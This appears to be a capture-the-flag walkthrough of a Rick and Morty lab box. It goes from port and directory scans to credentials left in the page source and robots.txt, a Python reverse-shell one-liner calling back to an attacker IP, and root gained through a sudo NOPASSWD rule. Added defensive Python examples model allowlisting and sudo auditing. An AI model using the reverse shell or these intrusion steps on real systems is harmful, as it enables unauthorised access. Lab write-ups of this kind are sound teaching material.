
This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.

1. Port and service scan

┌──(root㉿kali)-[/home/ace]
└─# nmap -T4 -sC -sV 10.10.77.88
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-02 20:35 CST
Nmap scan report for 10.10.77.88
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1fe0d95dd18260868b59be032663c81e (RSA)
| 256 e35968585967939fe85d95b2d4d687d1 (ECDSA)
|_ 256 616fd51e2aa6ee0675204c9a8b5e2111 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.74 seconds

Port 80 is open, so we can try the web server.

2. Exploring the pages

[screenshot: home page]

View the page source:

[screenshot: page source]

Oh my god, a username: R1ckRul3s

Brute-force directories and see whether anything is usable:

┌──(root㉿kali)-[/home/ace]
└─# dirsearch -u http://10.10.77.88/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.10.77.88/-_23-08-02_20-45-25.txt

Error Log: /root/.dirsearch/logs/errors-23-08-02_20-45-25.log

Target: http://10.10.77.88/

[20:45:26] Starting:
[20:45:40] 403 - 291B - /.php3
[20:46:21] 200 - 2KB - /assets/
[20:46:21] 301 - 311B - /assets -> http://10.10.77.88/assets/
[20:46:52] 200 - 1KB - /index.html
[20:46:59] 200 - 882B - /login.php
[20:47:20] 200 - 17B - /robots.txt
[20:47:22] 403 - 300B - /server-status/
[20:47:22] 403 - 299B - /server-status

Task Completed

Check robots.txt

[screenshot: robots.txt]

This is probably the password: Wubbalubbadubdub

Try it on the login page

Oh yeah!!!

[screenshot: login succeeded]

[screenshot: command panel]

Shit!!! They laid an ambush for me here!!!

Let's try a reverse shell

Read it with less

[screenshot: file read with less]
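The panel rejects `cat` but runs `less`, which is the signature of a denylist filter in front of a shell. The following is an added example, not code from the write-up or from the challenge, modelling that design next to its replacement: a denylist of forbidden words versus an allowlist of exact commands dispatched without any shell. The word list, the allowed commands and their argument counts are assumptions chosen for illustration.

```python
"""Added example (not from the write-up): denylist vs. allowlist for a web
command panel. The denylist words and the allowlist are assumptions."""
import shlex
from typing import Optional, List

# Assumed denylist: the words the panel's author thought of. Any program
# that is not listed (less, more, head, tail, ...) reads files just as well.
DENYLIST = ("cat", "grep")

# Assumed allowlist: the only programs the panel is meant to offer, mapped to
# the exact number of arguments each accepts. Nothing else is ever executed.
ALLOWLIST = {"whoami": 0, "uptime": 0, "ls": 0}


def denylist_permits(command: str) -> bool:
    """Model of the weak check: refuse only if a forbidden word occurs in the
    raw string. Everything the author did not enumerate reaches the shell."""
    return not any(word in command for word in DENYLIST)


def allowlist_argv(command: str) -> Optional[List[str]]:
    """Hardened check: split the input the way a shell would, require the
    program to be one the panel offers with the expected argument count, and
    return the argv to hand to subprocess.run(argv, shell=False). Anything
    else yields None, so ';', '|' or '$(...)' never reach a shell at all."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWLIST:
        return None
    if len(argv) - 1 != ALLOWLIST[argv[0]]:
        return None
    return argv


def compare(command: str) -> dict:
    """Evaluate one panel input under both designs."""
    return {
        "input": command,
        "denylist_permits": denylist_permits(command),
        "allowlist_argv": allowlist_argv(command),
    }


if __name__ == "__main__":
    # Constructed inputs: the two commands from the write-up, one legitimate
    # panel command, and one input that appends a second command.
    for cmd in ("cat clue.txt", "less clue.txt", "whoami", "whoami; id"):
        print(compare(cmd))
```

The second input shows the gap the write-up exploited: the denylist lets `less clue.txt` through because `less` was never enumerated, while the allowlist refuses it because `less` is not a command the panel offers. The allowlist also makes `shell=True` unnecessary, which removes the metacharacter problem entirely rather than filtering it.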

3. Reverse shell

export RHOST="<YOUR IP>";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Listen locally on port 4444

nc -lvnp 4444

Connected!!!

┌──(root㉿kali)-[/home/ace]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.18.75.12] from (UNKNOWN) [10.10.77.88] 54194
$ ls
ls
Sup3rS3cretPickl3Ingred.txt clue.txt index.html portal.php
assets denied.php login.php robots.txt
$

Next, look for the second ingredient:

python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ip-10-10-77-88:/var/www/html$ cd ../../..
cd ../../..
www-data@ip-10-10-77-88:/$ ls
ls
bin etc lib media proc sbin sys var
boot home lib64 mnt root snap tmp vmlinuz
dev initrd.img lost+found opt run srv usr
www-data@ip-10-10-77-88:/$ cd home
cd home
www-data@ip-10-10-77-88:/home$ ls
ls
rick ubuntu
www-data@ip-10-10-77-88:/home$ cd rick
cd rick
www-data@ip-10-10-77-88:/home/rick$ ls
ls
second ingredients
www-data@ip-10-10-77-88:/home/rick$ cat second ingredients
cat second ingredients
cat: second: No such file or directory
cat: ingredients: No such file or directory
www-data@ip-10-10-77-88:/home/rick$ cat "second ingredients"
cat "second ingredients"
1 jerry tear
www-data@ip-10-10-77-88:/home/rick$

4. Privilege escalation via sudo

www-data@ip-10-10-77-88:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on
ip-10-10-77-88.eu-west-1.compute.internal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
ip-10-10-77-88.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
www-data@ip-10-10-77-88:/home/rick$ sudo /bin/bash
sudo /bin/bash
root@ip-10-10-77-88:/home/rick# ls
ls
second ingredients
root@ip-10-10-77-88:/home/rick# cd ../..
cd ../..
root@ip-10-10-77-88:/# cd root
cd root
root@ip-10-10-77-88:~# ls
ls
3rd.txt snap
root@ip-10-10-77-88:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-77-88:~#
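The rule that ends this box, `(ALL) NOPASSWD: ALL` for the web server's own account, is the kind of thing a periodic audit should catch long before a CTF player does. The following is an added example, not from the write-up, that parses the text `sudo -l` prints and flags such rules. The rule syntax (runas in parentheses, optional `TAG:` words, comma-separated commands) is sudoers' own; the severity labels, the list of service accounts and the list of shell-escape binaries are this example's assumptions, and the two sample outputs are constructed (the first copies the write-up's).

```python
"""Added example (not from the write-up): audit `sudo -l` output for rules
that hand root to a service account. Severities and the binary list are
assumptions; the sample outputs are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Accounts that should never hold sudo rights (assumption).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# Programs that drop to a shell or read/write arbitrary files when run as
# root, so allowing one of them is as good as ALL (assumption, not exhaustive).
SHELL_ESCAPE_BINS = {"less", "more", "vi", "vim", "nano", "find", "awk",
                     "python", "python3", "perl", "bash", "sh"}

RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
USER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands")

# Constructed sample 1: the output shown in the write-up.
PAGE_SUDO_L = r"""Matching Defaults entries for www-data on
ip-10-10-77-88.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
ip-10-10-77-88.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
"""

# Constructed sample 2: a narrower but still dangerous rule set (hypothetical).
RICK_SUDO_L = """User rick may run the following commands on host:
    (root) NOPASSWD: /usr/bin/less /var/log/apache2/access.log, /usr/sbin/service apache2 restart
"""


@dataclass
class Finding:
    severity: str  # "critical" | "high" | "medium"
    rule: str
    reason: str


def parse_rule(line: str) -> Optional[Tuple[str, Set[str], List[str]]]:
    """Split '(root) NOPASSWD: SETENV: /bin/a, /bin/b' into
    (runas, tags, commands); return None for lines that are not rules."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    runas, rest = m.group("runas"), m.group("rest")
    tags: Set[str] = set()
    while (tm := re.match(r"^([A-Z]+):\s*", rest)):
        tags.add(tm.group(1))
        rest = rest[tm.end():]
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    return runas, tags, commands


def audit_sudo_l(output: str) -> List[Finding]:
    """Walk `sudo -l` output and return findings in the order rules appear."""
    findings: List[Finding] = []
    user = None
    for line in output.splitlines():
        um = USER_RE.match(line.strip())
        if um:
            user = um.group("user")
            continue
        parsed = parse_rule(line)
        if not parsed:
            continue
        runas, tags, commands = parsed
        nopasswd = "NOPASSWD" in tags
        rule = line.strip()
        for cmd in commands:
            prog = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the program
            if cmd == "ALL":
                reason = f"unrestricted root for {user}"
                reason += " without a password" if nopasswd else ""
                findings.append(Finding("critical", rule, reason))
            elif prog in SHELL_ESCAPE_BINS:
                findings.append(Finding("high", rule,
                                        f"{prog} escapes to a shell as {runas}"))
            elif nopasswd:
                findings.append(Finding("medium", rule,
                                        "NOPASSWD rule; review the arguments"))
        if user in SERVICE_ACCOUNTS:
            findings.append(Finding("high", rule,
                                    f"{user} is a service account; no sudo rules expected"))
    return findings


if __name__ == "__main__":
    for sample in (PAGE_SUDO_L, RICK_SUDO_L):
        for f in audit_sudo_l(sample):
            print(f"[{f.severity}] {f.rule}  <- {f.reason}")
```

On the write-up's output the auditor reports the `ALL` rule as critical and separately flags that `www-data` holds any sudo rule at all; a web server account needs neither. Running the same check from a configuration-management job, or over `sudo -l -U <user>` for each service account, turns this box's root step into an alert instead.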

over!!!